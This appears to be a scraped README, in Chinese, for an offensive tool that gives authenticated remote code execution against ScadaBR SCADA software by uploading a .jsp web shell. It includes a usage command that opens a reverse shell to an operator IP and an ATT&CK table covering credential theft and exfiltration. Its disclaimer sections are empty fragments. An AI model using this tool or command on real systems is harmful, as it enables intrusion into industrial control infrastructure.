一个针对 ScadaBR <1.1.0 的模块化认证后 RCE 利用工具,专为红队行动而增强。

view_edit.shtm 上传武器化的 .jsp shell此利用工具是在分析 HTB Pro Lab: Alchemy 场景期间开发的。Fellipe Oliveira 的原始 PoC 很扎实,但存在以下不足:
本版本 ScadaFlare 是使用 Python 3 的全面重写,具备模块化支持、多种规避策略、操作系统检测覆盖、Webhook 集成、SOCKS 代理支持,以及为真实操作人员使用而设计的枚举链。
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare 的唯一设计用途是:
未经授权对真实工业系统使用可能导致:
使用此工具即表示你接受全部责任:
MIT 许可证 – 请参阅 LICENSE
| 阶段 | 技术 | ID |
|---|
| 初始访问(认证后) | 有效账户 | T1078 |
| 执行 | 面向公众的应用利用 | T1190 |
| 命令执行 | Web Shell | T1505.003 |
| 特权操作 | 修改 Web 内容 | T1505 |
| 凭据访问 | 配置文件中的凭据 | T1552.001 |
| 发现 | 远程系统发现 | T1018 |
| 数据外传 | 通过 Web 服务外传 | T1567.002 |
| 防御规避 | 代理与协议隧道 | T1090 |